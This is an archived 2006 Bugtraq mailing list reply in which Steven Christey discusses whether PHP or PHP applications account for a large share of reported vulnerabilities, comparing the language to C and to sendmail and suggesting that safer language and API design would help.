Bugtraq mailing list archives
Re: PHP security (or the lack thereof)
From: "Steven M. Christey" <coley () mitre org>
Date: Fri, 16 Jun 2006 19:25:22 -0400 (EDT)
Darren Reed said:
From my own mail archives, PHP appears to make up at least 4% of the email to bugtraq I see - or over 1000 issues since 1995, out of the 25,000 I have saved.
Do you mean the PHP interpreter? Or applications written in PHP? I'm not sure how many vulnerabilities were in the PHP interpreter itself, but it looks like it's about 150 or so. Applications that are WRITTEN in PHP, however, probably cover 20% or more of all reported vulns this year. This is just a hunch - I don't have any way of proving this. Most PHP apps don't have "php" in their name, and I don't know of a vulnerability database that records which programming language was used for an application. But the rest of your email matches on "php" were probably PHP applications.
People complain about applications like sendmail...in the same period, it has been resopnsible for less than 200.
It's more appropriate to compare the PHP language to the C language, or to compare Sendmail to various high-profile PHP applications.
Do we have a new contender for worst security offender ever written
Over the years, the PHP language has made it very easy for inexperienced application programmers to shoot themselves in the foot, and it has features that even experienced programmers might not know to defend against. Sounds kinda like C, doesn't it? One thing with PHP though, you don't need much training before you can put together a usable program. Powerful features plus lots of non-expert programmers equals a lot of vulnerabilities, regardless of the language. PHP is slowly removing the most dangerous features, or at least not enabling them by default. I suspect that a large percentage of vulnerabilities could be fixed with programming languages with built-in security considerations, and an API that makes it easy or transparent to do safer programming. - Steve ======================================================================= Disclaimer: this document was publicly posted to foster timely technical exchange. It may contain errors or omissions. The views and opinions being expressed are those of Steve Christey and do not necessarily reflect the views of The MITRE Corporation. Members of the press are requested to contact me directly before quoting any statements in this document.
Current thread:
- Re: PHP security (or the lack thereof), (continued)
- Re: PHP security (or the lack thereof) Geo. (Jun 19)
- Re: PHP security (or the lack thereof) kicktd (Jun 21)
- Re: PHP security (or the lack thereof) Geo. (Jun 21)
- Re: PHP security (or the lack thereof) Crispin Cowan (Jun 22)
- Re: PHP security (or the lack thereof) Geo. (Jun 19)
- Re: PHP security (or the lack thereof) Neil Neely (Jun 19)
- Re: PHP security (or the lack thereof) john mullee (Jun 23)
- Re: PHP security (or the lack thereof) Darren Reed (Jun 26)
- Re: PHP security (or the lack thereof) Ronald Chmara (Jun 27)
- Re: PHP security (or the lack thereof) Tonnerre Lombard (Jun 28)
- Re: PHP security (or the lack thereof) Darren Reed (Jun 28)
- Re: PHP security (or the lack thereof) Darren Reed (Jun 26)
- Re: PHP security (or the lack thereof) Geo. (Jun 23)
- Re: PHP security (or the lack thereof) Crispin Cowan (Jun 23)
- Re: PHP security (or the lack thereof) Daniel Hulme (Jun 26)
- Re: PHP security (or the lack thereof) Tobias J. Kreidl (Jun 26)
- Re: PHP security (or the lack thereof) Glynn Clements (Jun 27)
- Re: PHP security (or the lack thereof) Ronald Chmara (Jun 26)
- RE: PHP security (or the lack thereof) Geo. (Jun 26)
- Re: PHP security (or the lack thereof) Paul Schmehl (Jun 26)